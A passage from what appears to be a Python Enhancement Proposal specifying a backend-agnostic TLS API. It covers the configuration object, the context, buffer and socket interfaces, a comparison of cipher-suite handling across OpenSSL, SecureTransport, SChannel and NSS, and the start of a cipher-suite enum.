This class has one other notable property: it is immutable. This is a desirable +trait for a few reasons. The most important one is that it allows these objects +to be used as dictionary keys, which is potentially extremely valuable for +certain TLS backends and their SNI configuration. On top of this, it frees +implementations from needing to worry about their configuration objects being +changed under their feet, which allows them to avoid needing to carefully +synchronize changes between their concrete data structures and the +configuration object.

+

This object is extendable: that is, future releases of Python may add +configuration fields to this object as they become useful. For +backwards-compatibility purposes, new fields are only appended to this object. +Existing fields will never be removed, renamed, or reordered.

+

The TLSConfiguration object would be defined by the following code:

+
ServerNameCallback = Callable[[TLSBufferObject, Optional[str], TLSConfiguration], Any]
+
+
+_configuration_fields = [
+    'validate_certificates',
+    'certificate_chain',
+    'ciphers',
+    'inner_protocols',
+    'lowest_supported_version',
+    'highest_supported_version',
+    'trust_store',
+    'sni_callback',
+]
+
+
+_DEFAULT_VALUE = object()
+
+
+class TLSConfiguration(namedtuple('TLSConfiguration', _configuration_fields)):
+    """
+    An immutable TLS Configuration object. This object has the following
+    properties:
+
+    :param validate_certificates bool: Whether to validate the TLS
+        certificates. This switch operates at a very broad scope: either
+        validation is enabled, in which case all forms of validation are
+        performed including hostname validation if possible, or validation
+        is disabled, in which case no validation is performed.
+
+        Not all backends support having their certificate validation
+        disabled. If a backend does not support having their certificate
+        validation disabled, attempting to set this property to ``False``
+        will throw a ``TLSError`` when this object is passed into a
+        context object.
+
+    :param certificate_chain Tuple[Tuple[Certificate],PrivateKey]: The
+        certificate, intermediate certificate, and the corresponding
+        private key for the leaf certificate. These certificates will be
+        offered to the remote peer during the handshake if required.
+
+        The first Certificate in the list must be the leaf certificate. All
+        subsequent certificates will be offered as intermediate additional
+        certificates.
+
+    :param ciphers Tuple[Union[CipherSuite, int]]:
+        The available ciphers for TLS connections created with this
+        configuration, in priority order.
+
+    :param inner_protocols Tuple[Union[NextProtocol, bytes]]:
+        Protocols that connections created with this configuration should
+        advertise as supported during the TLS handshake. These may be
+        advertised using either or both of ALPN or NPN. This list of
+        protocols should be ordered by preference.
+
+    :param lowest_supported_version TLSVersion:
+        The minimum version of TLS that should be allowed on TLS
+        connections using this configuration.
+
+    :param highest_supported_version TLSVersion:
+        The maximum version of TLS that should be allowed on TLS
+        connections using this configuration.
+
+    :param trust_store TrustStore:
+        The trust store that connections using this configuration will use
+        to validate certificates.
+
+    :param sni_callback Optional[ServerNameCallback]:
+        A callback function that will be called after the TLS Client Hello
+        handshake message has been received by the TLS server when the TLS
+        client specifies a server name indication.
+
+        Only one callback can be set per ``TLSConfiguration``. If the
+        ``sni_callback`` is ``None`` then the callback is disabled. If the
+        ``TLSConfiguration`` is used for a ``ClientContext`` then this
+        setting will be ignored.
+
+        The ``callback`` function will be called with three arguments: the
+        first will be the ``TLSBufferObject`` for the connection; the
+        second will be a string that represents the server name that the
+        client is intending to communicate (or ``None`` if the TLS Client
+        Hello does not contain a server name); and the third argument will
+        be the original ``TLSConfiguration`` that configured the
+        connection. The server name argument will be the IDNA *decoded*
+        server name.
+
+        The ``callback`` must return a ``TLSConfiguration`` to allow
+        negotiation to continue. Other return values signal errors.
+        Attempting to control what error is signaled by the underlying TLS
+        implementation is not specified in this API, but is up to the
+        concrete implementation to handle.
+
+        The Context will do its best to apply the ``TLSConfiguration``
+        changes from its original configuration to the incoming connection.
+        This will usually include changing the certificate chain, but may
+        also include changes to allowable ciphers or any other
+        configuration settings.
+    """
+    __slots__ = ()
+
+    def __new__(cls, validate_certificates: Optional[bool] = None,
+                     certificate_chain: Optional[Tuple[Tuple[Certificate], PrivateKey]] = None,
+                     ciphers: Optional[Tuple[Union[CipherSuite, int]]] = None,
+                     inner_protocols: Optional[Tuple[Union[NextProtocol, bytes]]] = None,
+                     lowest_supported_version: Optional[TLSVersion] = None,
+                     highest_supported_version: Optional[TLSVersion] = None,
+                     trust_store: Optional[TrustStore] = None,
+                     sni_callback: Optional[ServerNameCallback] = None):
+
+        if validate_certificates is None:
+            validate_certificates = True
+
+        if ciphers is None:
+            ciphers = DEFAULT_CIPHER_LIST
+
+        if inner_protocols is None:
+            inner_protocols = []
+
+        if lowest_supported_version is None:
+            lowest_supported_version = TLSVersion.TLSv1
+
+        if highest_supported_version is None:
+            highest_supported_version = TLSVersion.MAXIMUM_SUPPORTED
+
+        return super().__new__(
+            cls, validate_certificates, certificate_chain, ciphers,
+            inner_protocols, lowest_supported_version,
+            highest_supported_version, trust_store, sni_callback
+        )
+
+    def update(self, validate_certificates=_DEFAULT_VALUE,
+                     certificate_chain=_DEFAULT_VALUE,
+                     ciphers=_DEFAULT_VALUE,
+                     inner_protocols=_DEFAULT_VALUE,
+                     lowest_supported_version=_DEFAULT_VALUE,
+                     highest_supported_version=_DEFAULT_VALUE,
+                     trust_store=_DEFAULT_VALUE,
+                     sni_callback=_DEFAULT_VALUE):
+        """
+        Create a new ``TLSConfiguration``, overriding some of the settings
+        on the original configuration with the new settings.
+        """
+        if validate_certificates is _DEFAULT_VALUE:
+            validate_certificates = self.validate_certificates
+
+        if certificate_chain is _DEFAULT_VALUE:
+            certificate_chain = self.certificate_chain
+
+        if ciphers is _DEFAULT_VALUE:
+            ciphers = self.ciphers
+
+        if inner_protocols is _DEFAULT_VALUE:
+            inner_protocols = self.inner_protocols
+
+        if lowest_supported_version is _DEFAULT_VALUE:
+            lowest_supported_version = self.lowest_supported_version
+
+        if highest_supported_version is _DEFAULT_VALUE:
+            highest_supported_version = self.highest_supported_version
+
+        if trust_store is _DEFAULT_VALUE:
+            trust_store = self.trust_store
+
+        if sni_callback is _DEFAULT_VALUE:
+            sni_callback = self.sni_callback
+
+        return self.__class__(
+            validate_certificates, certificate_chain, ciphers,
+            inner_protocols, lowest_supported_version,
+            highest_supported_version, trust_store, sni_callback
+        )
+
+
+
+
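The immutable-update pattern above can be verified in isolation; this self-contained sketch uses a cut-down two-field configuration, rather than the full class, purely to illustrate the behaviour:
from collections import namedtuple
+
+_DEFAULT = object()
+
+class MiniConfig(namedtuple('MiniConfig', ['validate_certificates', 'ciphers'])):
+    __slots__ = ()
+
+    def update(self, validate_certificates=_DEFAULT, ciphers=_DEFAULT):
+        # Any omitted field is carried over from the existing object.
+        if validate_certificates is _DEFAULT:
+            validate_certificates = self.validate_certificates
+        if ciphers is _DEFAULT:
+            ciphers = self.ciphers
+        return self.__class__(validate_certificates, ciphers)
+
+base = MiniConfig(validate_certificates=True, ciphers=())
+loose = base.update(validate_certificates=False)
+assert base.validate_certificates and not loose.validate_certificates
+assert base is not loose           # update() returns a brand-new object
+assert {base: 'a', loose: 'b'}     # hashable, so usable as dictionary keys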
+

Context

+

We define two Context abstract base classes. These ABCs define objects that +allow configuration of TLS to be applied to specific connections. They can be +thought of as factories for TLSWrappedSocket and TLSWrappedBuffer +objects.

+

Unlike the current ssl module, we provide two context classes instead of +one. Specifically, we provide the ClientContext and ServerContext +classes. This simplifies the APIs (for example, there is no sense in the server +providing the server_hostname parameter to ssl.SSLContext.wrap_socket, +but because there is only one context class that parameter is still available), +and ensures that implementations know as early as possible which side of a TLS +connection they will serve. Additionally, it allows implementations to opt out +of either side of the connection. For example, SecureTransport on macOS +is not really intended for server use and is missing an enormous amount of +server-side functionality. This would allow SecureTransport +implementations to simply not define a concrete subclass of ServerContext +to signal their lack of support.

+

One of the other major differences to the current ssl module is that a +number of flags and options have been removed. Most of these are self-evident, +but it is worth noting that auto_handshake has been removed from +wrap_socket. This was removed because it fundamentally represents an odd +design wart that saves very minimal effort at the cost of a complexity increase +both for users and implementers. This PEP requires that all users call +do_handshake explicitly after connecting.

+

As much as possible, implementers should aim to make these classes immutable: +that is, they should prefer not to allow users to mutate their internal state +directly, instead preferring to create new contexts from new TLSConfiguration +objects. Obviously, the ABCs cannot enforce this constraint, and so they do not +attempt to.

+

The Context abstract base classes have the following class definitions:

+
TLSBufferObject = Union[TLSWrappedSocket, TLSWrappedBuffer]
+
+
+class _BaseContext(metaclass=ABCMeta):
+    @abstractmethod
+    def __init__(self, configuration: TLSConfiguration):
+        """
+        Create a new context object from a given TLS configuration.
+        """
+
+    @property
+    @abstractmethod
+    def configuration(self) -> TLSConfiguration:
+        """
+        Returns the TLS configuration that was used to create the context.
+        """
+
+
+class ClientContext(_BaseContext):
+    def wrap_socket(self,
+                    socket: socket.socket,
+                    server_hostname: Optional[str]) -> TLSWrappedSocket:
+        """
+        Wrap an existing Python socket object ``socket`` and return a
+        ``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
+        socket: all other socket types are unsupported.
+
+        The returned SSL socket is tied to the context, its settings and
+        certificates. The socket object originally passed to this method
+        should not be used again: attempting to use it in any way will lead
+        to undefined behaviour, especially across different TLS
+        implementations. To get the original socket object back once it has
+        been wrapped in TLS, see the ``unwrap`` method of the
+        TLSWrappedSocket.
+
+        The parameter ``server_hostname`` specifies the hostname of the
+        service which we are connecting to. This allows a single server to
+        host multiple SSL-based services with distinct certificates, quite
+        similarly to HTTP virtual hosts. This is also used to validate the
+        TLS certificate for the given hostname. If hostname validation is
+        not desired, then pass ``None`` for this parameter. This parameter
+        has no default value because opting-out of hostname validation is
+        dangerous, and should not be the default behaviour.
+        """
+        buffer = self.wrap_buffers(server_hostname)
+        return TLSWrappedSocket(socket, buffer)
+
+    @abstractmethod
+    def wrap_buffers(self, server_hostname: Optional[str]) -> TLSWrappedBuffer:
+        """
+        Create an in-memory stream for TLS, using memory buffers to store
+        incoming and outgoing ciphertext. The TLS routines will read
+        received TLS data from one buffer, and write TLS data that needs to
+        be emitted to another buffer.
+
+        The implementation details of how this buffering works are up to
+        the individual TLS implementation. This allows TLS libraries that
+        have their own specialised support to continue to do so, while
+        allowing those without to use whatever Python objects they see fit.
+
+        The ``server_hostname`` parameter has the same meaning as in
+        ``wrap_socket``.
+        """
+
+
+class ServerContext(_BaseContext):
+    def wrap_socket(self, socket: socket.socket) -> TLSWrappedSocket:
+        """
+        Wrap an existing Python socket object ``socket`` and return a
+        ``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
+        socket: all other socket types are unsupported.
+
+        The returned SSL socket is tied to the context, its settings and
+        certificates. The socket object originally passed to this method
+        should not be used again: attempting to use it in any way will lead
+        to undefined behaviour, especially across different TLS
+        implementations. To get the original socket object back once it has
+        been wrapped in TLS, see the ``unwrap`` method of the
+        TLSWrappedSocket.
+        """
+        buffer = self.wrap_buffers()
+        return TLSWrappedSocket(socket, buffer)
+
+    @abstractmethod
+    def wrap_buffers(self) -> TLSWrappedBuffer:
+        """
+        Create an in-memory stream for TLS, using memory buffers to store
+        incoming and outgoing ciphertext. The TLS routines will read
+        received TLS data from one buffer, and write TLS data that needs to
+        be emitted to another buffer.
+
+        The implementation details of how this buffering works are up to
+        the individual TLS implementation. This allows TLS libraries that
+        have their own specialised support to continue to do so, while
+        allowing those without to use whatever Python objects they see fit.
+        """
+
+
+
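A concrete backend is then a thin subclass of one of these ABCs. The toy below, with hypothetical names and all actual TLS work elided, shows only the intended shape:
from abc import ABCMeta, abstractmethod
+
+class _BaseContext(metaclass=ABCMeta):  # abridged copy of the ABC above
+    @abstractmethod
+    def __init__(self, configuration): ...
+
+    @property
+    @abstractmethod
+    def configuration(self): ...
+
+class ToyClientContext(_BaseContext):
+    """Hypothetical backend: holds the immutable configuration read-only."""
+    def __init__(self, configuration):
+        self._configuration = configuration
+
+    @property
+    def configuration(self):
+        return self._configuration
+
+ctx = ToyClientContext(configuration={'validate_certificates': True})
+assert ctx.configuration['validate_certificates']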
+
+

Buffer

+

The buffer-wrapper ABC will be defined by the TLSWrappedBuffer ABC, which +has the following definition:

+
class TLSWrappedBuffer(metaclass=ABCMeta):
+    @abstractmethod
+    def read(self, amt: int) -> bytes:
+        """
+        Read up to ``amt`` bytes of data from the input buffer and return
+        the result as a ``bytes`` instance.
+
+        Once EOF is reached, all further calls to this method return the
+        empty byte string ``b''``.
+
+        May read "short": that is, fewer bytes may be returned than were
+        requested.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to ``read()``
+        can also cause write operations.
+        """
+
+    @abstractmethod
+    def readinto(self, buffer: Any, amt: int) -> int:
+        """
+        Read up to ``amt`` bytes of data from the input buffer into
+        ``buffer``, which must be an object that implements the buffer
+        protocol. Returns the number of bytes read.
+
+        Once EOF is reached, all further calls to this method return 0.
+
+        Raises ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May read "short": that is, fewer bytes may be read than were
+        requested.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to
+        ``readinto()`` can also cause write operations.
+        """
+
+    @abstractmethod
+    def write(self, buf: Any) -> int:
+        """
+        Write ``buf`` in encrypted form to the output buffer and return the
+        number of bytes written. The ``buf`` argument must be an object
+        supporting the buffer interface.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read. In either
+        case, users should endeavour to resolve that situation and then
+        re-call this method. When re-calling this method users *should*
+        re-use the exact same ``buf`` object, as some backends require that
+        the exact same buffer be used.
+
+        This operation may write "short": that is, fewer bytes may be
+        written than were in the buffer.
+
+        As at any time a re-negotiation is possible, a call to ``write()``
+        can also cause read operations.
+        """
+
+    @abstractmethod
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification.
+        """
+
+    @abstractmethod
+    def cipher(self) -> Optional[Union[CipherSuite, int]]:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+
+    @abstractmethod
+    def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+
+    @property
+    @abstractmethod
+    def context(self) -> Context:
+        """
+        The ``Context`` object this buffer is tied to.
+        """
+
+    @property
+    @abstractmethod
+    def negotiated_tls_version(self) -> Optional[TLSVersion]:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+
+    @abstractmethod
+    def shutdown(self) -> None:
+        """
+        Performs a clean TLS shut down. This should generally be used
+        whenever possible to signal to the remote peer that the content is
+        finished.
+        """
+
+    @abstractmethod
+    def receive_from_network(self, data):
+        """
+        Receives some TLS data from the network and stores it in an
+        internal buffer.
+        """
+
+    @abstractmethod
+    def peek_outgoing(self, amt):
+        """
+        Returns the next ``amt`` bytes of data that should be written to
+        the network from the outgoing data buffer, without removing it from
+        the internal buffer.
+        """
+
+    @abstractmethod
+    def consume_outgoing(self, amt):
+        """
+        Discard the next ``amt`` bytes from the outgoing data buffer. This
+        should be used when ``amt`` bytes have been sent on the network, to
+        signal that the data no longer needs to be buffered.
+        """
+
+
+
+
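The intended I/O pattern for this API is a pump loop that shuttles ciphertext between the buffer and the network. The sketch below assumes some concrete TLSWrappedBuffer instance buf and a connected blocking socket, and uses stand-in definitions for the exceptions specified in the Errors section later in this PEP:
import socket
+
+class WantReadError(Exception): ...   # stand-ins for the exceptions
+class WantWriteError(Exception): ...  # defined in the Errors section below
+
+def pump_handshake(buf, sock: socket.socket) -> None:
+    """Drive buf.do_handshake() to completion over a real socket."""
+    while True:
+        try:
+            buf.do_handshake()
+            return
+        except WantWriteError:
+            # Drain ciphertext that the TLS implementation wants sent.
+            sent = sock.send(buf.peek_outgoing(8192))
+            buf.consume_outgoing(sent)
+        except WantReadError:
+            # Flush anything pending first, then feed in fresh ciphertext.
+            pending = buf.peek_outgoing(8192)
+            if pending:
+                buf.consume_outgoing(sock.send(pending))
+            buf.receive_from_network(sock.recv(8192))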
+

Socket

+

The socket-wrapper class will be a concrete class that accepts two items in its +constructor: a regular socket object, and a TLSWrappedBuffer object. This +object will be too large to reproduce in this PEP, but will be submitted as part +of the work to build the module.

+

The wrapped socket will implement all of the socket API, though it will have +stub implementations of methods that only work for sockets with types other +than SOCK_STREAM (e.g. sendto/recvfrom). That limitation can be +lifted as-and-when support for DTLS is added to this module.

+

In addition, the socket class will include the following extra methods on top +of the regular socket methods:

+
class TLSWrappedSocket:
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification. This must be called after the socket has
+        connected (either via ``connect`` or ``accept``), before any other
+        operation is performed on the socket.
+        """
+
+    def cipher(self) -> Optional[Union[CipherSuite, int]]:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+
+    def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+
+    @property
+    def context(self) -> Context:
+        """
+        The ``Context`` object this socket is tied to.
+        """
+
+    def negotiated_tls_version(self) -> Optional[TLSVersion]:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+
+    def unwrap(self) -> socket.socket:
+        """
+        Cleanly terminate the TLS connection on this wrapped socket. Once
+        called, this ``TLSWrappedSocket`` can no longer be used to transmit
+        data. Returns the socket that was wrapped with TLS.
+        """
+
+
+
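Putting the pieces together, client code written against this API would look roughly like the following; client_context stands for any concrete ClientContext implementation, and the HTTP request is purely illustrative:
import socket
+
+def fetch_head(client_context, host: str, port: int = 443) -> bytes:
+    """Sketch of the intended calling pattern, not a real implementation."""
+    raw = socket.create_connection((host, port))
+    tls_sock = client_context.wrap_socket(raw, server_hostname=host)
+    tls_sock.do_handshake()    # explicit: auto_handshake was removed
+    tls_sock.send(b"HEAD / HTTP/1.1\r\nHost: %s\r\n\r\n" % host.encode())
+    response = tls_sock.recv(8192)
+    tls_sock.unwrap().close()  # clean TLS shutdown, then close the raw socket
+    return response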
+
+

Cipher Suites

+

Supporting cipher suites in a truly library-agnostic fashion is a remarkably +difficult undertaking. Different TLS implementations often have radically +different APIs for specifying cipher suites, but more problematically these +APIs frequently differ in capability as well as in style. Some examples are +shown below:

+
+
OpenSSL
+

OpenSSL uses a well-known cipher string format. This format has been adopted as +a configuration language by most products that use OpenSSL, including Python. +This format is relatively easy to read, but has a number of downsides: it is +a string, which makes it remarkably easy to provide bad inputs; it lacks much +detailed validation, meaning that it is possible to configure OpenSSL in a way +that doesn’t allow it to negotiate any cipher at all; and it allows specifying +cipher suites in a number of different ways that make it tricky to parse. The +biggest problem with this format is that there is no formal specification for +it, meaning that the only way to parse a given string the way OpenSSL would is +to get OpenSSL to parse it.

+

OpenSSL’s cipher strings can look like this:

+
'ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5'
+
+
+

This string demonstrates some of the complexity of the OpenSSL format. For +example, it is possible for one entry to specify multiple cipher suites: the +entry ECDH+AESGCM means “all cipher suites that include both +elliptic-curve Diffie-Hellman key exchange and AES in Galois Counter Mode”. +More explicitly, that will expand to four cipher suites:

+
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
+
+
+

That makes parsing a complete OpenSSL cipher string extremely tricky. Add to +that the fact that there are other meta-characters, such as “!” (exclude all cipher +suites that match this criterion, even if they would otherwise be included: +“!MD5” means that no cipher suites using the MD5 hash algorithm should be +included), “-” (exclude matching ciphers if they were already included, but +allow them to be re-added later if they get included again), and “+” (include +the matching ciphers, but place them at the end of the list), and you get an +extremely complex format to parse. On top of this complexity, it should be +noted that the actual result depends on the OpenSSL version, as an OpenSSL +cipher string is valid so long as it contains at least one cipher that OpenSSL +recognises.

+

OpenSSL also uses different names for its ciphers than the names used in the +relevant specifications. See the manual page for ciphers(1) for more +details.

+

The actual API inside OpenSSL for the cipher string is simple:

+
char *cipher_list = <some cipher list>;
+int rc = SSL_CTX_set_cipher_list(context, cipher_list);
+
+
+

This means that any format that is used by this module must be able to be +converted to an OpenSSL cipher string for use with OpenSSL.

+
+
+
SecureTransport
+

SecureTransport is the macOS system TLS library. This library is substantially +more restricted than OpenSSL in many ways, as it has a much more restricted +class of users. One of these substantial restrictions is in controlling +supported cipher suites.

+

Ciphers in SecureTransport are represented by a C enum. This enum has one +entry per cipher suite, with no aggregate entries, meaning that it is not +possible to reproduce the meaning of an OpenSSL cipher string like +“ECDH+AESGCM” without hand-coding which categories each enum member falls into.

+

However, the names of most of the enum members are in line with the formal +names of the cipher suites: that is, the cipher suite that OpenSSL calls +“ECDHE-ECDSA-AES256-GCM-SHA384” is called +“TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384” in SecureTransport.

+

The API for configuring cipher suites inside SecureTransport is simple:

+
SSLCipherSuite ciphers[] = {TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ...};
+OSStatus status = SSLSetEnabledCiphers(context, ciphers, sizeof(ciphers) / sizeof(ciphers[0]));
+
+
+
+
+
SChannel
+

SChannel is the Windows system TLS library.

+

SChannel has extremely restrictive support for controlling available TLS +cipher suites, and additionally adopts a third method of expressing what TLS +cipher suites are supported.

+

Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints). +Each of these constants does not refer to an entire cipher suite, but instead +an individual algorithm. Some examples are CALG_3DES and CALG_AES_256, +which refer to the bulk encryption algorithm used in a cipher suite, +CALG_DH_EPHEM and CALG_RSA_KEYX which refer to part of the key exchange +algorithm used in a cipher suite, CALG_SHA1 and CALG_MD5 which refer to +the message authentication code used in a cipher suite, and CALG_ECDSA and +CALG_RSA_SIGN which refer to the signing portions of the key exchange +algorithm.

+

This can be thought of as the half of OpenSSL’s functionality that +SecureTransport doesn’t have: SecureTransport only allows specifying exact +cipher suites, while SChannel only allows specifying parts of the cipher +suite, while OpenSSL allows both.

+

Determining which cipher suites are allowed on a given connection is done by +providing a pointer to an array of these ALG_ID constants. This means that +any suitable API must allow the Python code to determine which ALG_ID +constants must be provided.

+
+
+
Network Security Services (NSS)
+

NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird, +and as an alternative to OpenSSL in multiple libraries, e.g. curl.

+

By default, NSS comes with secure configuration of allowed ciphers. On some +platforms such as Fedora, the list of enabled ciphers is globally configured +in a system policy. Generally, applications should not modify cipher suites +unless they have specific reasons to do so.

+

NSS has both process-global and per-connection settings for cipher suites. It +does not have a concept of SSLContext like OpenSSL. An SSLContext-like behavior +can be easily emulated. Specifically, ciphers can be enabled or disabled +globally with SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled), +and SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled) +for a connection. The cipher PRInt32 number is a signed 32-bit integer +that directly corresponds to a registered IANA id, e.g. 0x1301 +is TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order +of ciphers is fixed and cannot be modified at runtime.

+

Like SecureTransport, NSS has no API for aggregated entries. Some consumers +of NSS have implemented custom mappings from OpenSSL cipher names and rules +to NSS ciphers, e.g. mod_nss.

+
+
+
Proposed Interface
+

The proposed interface for the new module is influenced by the combined set of +limitations of the above implementations. Specifically, as every implementation +except OpenSSL requires that each individual cipher be provided, there is no +option but to take that lowest-common-denominator approach.

+

The simplest approach is to provide an enumerated type that includes a large +subset of the cipher suites defined for TLS. The values of the enum members +will be their two-octet cipher identifier as used in the TLS handshake, +stored as a 16-bit integer. The names of the enum members will be their +IANA-registered cipher suite names.

+

As of now, the IANA cipher suite registry contains over 320 cipher suites. +A large portion of the cipher suites are irrelevant for TLS connections to +network services. Other suites specify deprecated and insecure algorithms +that are no longer provided by recent versions of implementations. The enum +does not contain ciphers with:

+
    +
  • key exchange: NULL, Kerberos (KRB5), pre-shared key (PSK), secure remote +transport (TLS-SRP)
  • +
  • authentication: NULL, anonymous, export grade, Kerberos (KRB5), +pre-shared key (PSK), secure remote transport (TLS-SRP), DSA cert (DSS)
  • +
  • encryption: NULL, ARIA, DES, RC2, export grade 40bit
  • +
  • PRF: MD5
  • +
  • SCSV cipher suites
  • +
+

3DES, RC4, SEED, and IDEA are included for legacy applications. Furthermore, +five additional cipher suites from the TLS 1.3 draft (draft-ietf-tls-tls13-18) +are also included. TLS 1.3 does not share any cipher suites with TLS 1.2 and +earlier. The resulting enum will contain roughly 110 suites.

+

Because of these limitations, and because the enum doesn’t contain every +defined cipher, and also to allow for forward-looking applications, all parts +of this API that accept CipherSuite objects will also accept raw 16-bit +integers directly.

+

Rather than populate this enum by hand, we have a TLS enum script that +builds it from Christian Heimes’ tlsdb JSON file (warning: +large file) and the IANA cipher suite registry. The TLSDB also opens up the +possibility of extending the API with additional querying functions, +such as determining which TLS versions support which ciphers, if that +functionality is found to be useful or necessary.

+

If users find this approach to be onerous, a future extension to this API can +provide helpers that can reintroduce OpenSSL’s aggregation functionality.

+
class CipherSuite(IntEnum):
+    TLS_RSA_WITH_RC4_128_SHA = 0x0005
+    TLS_RSA_WITH_IDEA_CBC_SHA = 0x0007
+    TLS_RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
+    TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA = 0x0010
+    TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
+    TLS_RSA_WITH_AES_128_CBC_SHA = 0x002f
+    TLS_DH_RSA_WITH_AES_128_CBC_SHA = 0x0031
+    TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
+    TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
+    TLS_DH_RSA_WITH_AES_256_CBC_SHA = 0x0037
+    TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
+    TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003c
+    TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003d
+    TLS_DH_RSA_WITH_AES_128_CBC_SHA256 = 0x003f
+    TLS_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0041
+    TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0043
+    TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0045
+    TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
+    TLS_DH_RSA_WITH_AES_256_CBC_SHA256 = 0x0069
+    TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006b
+    TLS_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
+    TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0086
+    TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
+    TLS_RSA_WITH_SEED_CBC_SHA = 0x0096
+    TLS_DH_RSA_WITH_SEED_CBC_SHA = 0x0098
+    TLS_DHE_RSA_WITH_SEED_CBC_SHA = 0x009a
+    TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009c
+    TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009d
+    TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009e
+    TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009f
+    TLS_DH_RSA_WITH_AES_128_GCM_SHA256 = 0x00a0
+    TLS_DH_RSA_WITH_AES_256_GCM_SHA384 = 0x00a1
+    TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00ba
+    TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00bc
+    TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00be
+    TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c0
+    TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c2
+    TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c4
+    TLS_AES_128_GCM_SHA256 = 0x1301
+    TLS_AES_256_GCM_SHA384 = 0x1302
+    TLS_CHACHA20_POLY1305_SHA256 = 0x1303
+    TLS_AES_128_CCM_SHA256 = 0x1304
+    TLS_AES_128_CCM_8_SHA256 = 0x1305
+    TLS_ECDH_ECDSA_WITH_RC4_128_SHA = 0xc002
+    TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc003
+    TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA = 0xc004
+    TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
+    TLS_ECDHE_ECDSA_WITH_RC4_128_SHA = 0xc007
